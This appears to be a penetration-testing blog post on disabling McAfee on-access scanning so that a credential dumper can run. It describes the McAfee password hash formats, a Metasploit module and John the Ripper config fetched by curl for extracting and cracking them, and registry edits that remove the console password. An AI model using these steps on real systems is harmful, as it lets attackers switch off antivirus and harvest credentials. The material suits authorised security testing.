Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

Disabling McAfee On-Access Scanning

In a recent internal penetration test I came across in a situation where although I was local administrator on a Windows server and I could not run Windows Credentials Editor (WCE) because it was detected as a malicious threat in the McAfee on-access scan, as you can see below:

The first thought was to disable it but for security reasons McAfee prevents Administrators from stopping the service:

or killing the process:

Then, I thought to stop McAfee directly but when I went to the McAfee console I noticed that it was password protected:

After Googling a bit I discovered that McAfee stores the hash of that password in the registry key. If the version of McAfee is 5.x then the password hash is in the format md5(unicode(password)), option “–format=md5u” in JTR. If the version of McAfee is 8.x then it is base64(sha1(unicode(“\x01\x0f\x0d\x33”+password)). Contrary to the first format, by default JTR doesn’t come with a format option for cracking that hash (base64(sha1(unicode(“\x01\x0f\x0d\x33″+password))) so you would need to edit your local.john.conf by adding a dynamic format. I have written both a Metasploit post module that grabs the hash from the registry key and the dynamic format which is necessary for cracking the hash version 8.x of McAfee.

[22/01/2015] This module is now part of Metasploit master branch: mcafee_vse_hashdump.rb

Installation

mkdir -p ~/.msf4/modules/post/windows/gather/credentials
curl -O https://raw.githubusercontent.com/m7x/Metasploit-Modules/master/post/windows/gather/credentials/mcafee_hashdump.rb
curl https://raw.githubusercontent.com/m7x/stuff/master/john.local.conf >> your_john_path/john.local.conf

Usage

Once Meterpreter is running on the targeted machine and has enough permissions for accessing the registry key you can run the post exploitation module as shown below.

The module stores the hash in the Metasploit database which is a good place to keep all harvested credentials.

Finally, you need to load the hash in john specifying the dynamic format and hope that the password or some variants are in your dictionary.

Obtaining clear-text passwords during a penetration test is always good since the same passwords might have been re-used in other systems and could let you to compromise other systems. However, if you have physical access to the target machine and you can reboot it (which is normally not possible during an assessment) you could enter in Safe Mode and set to blank the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\McAfee\DesktopProtection\UIP = ""

And set this other one to 0:

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\McAfee\DesktopProtection\UIPMode = "0"

This would let you open McAfee console without requiring a password.

Troubleshooting

If John returns the following error message when you are trying to crack the hash, use the option “-enc:8859-1”
This format does not yet support other encodings than ISO-8859-1

Find out how we can help with your cyber challenge

Please enter your contact details using the form below for a free, no obligation, quote and we will get back to you as soon as possible. Alternatively, you can email us directly at busdev@www.dionach.com
Contact Us

Contact Us Reach out to one of our cyber experts and we will arrange a call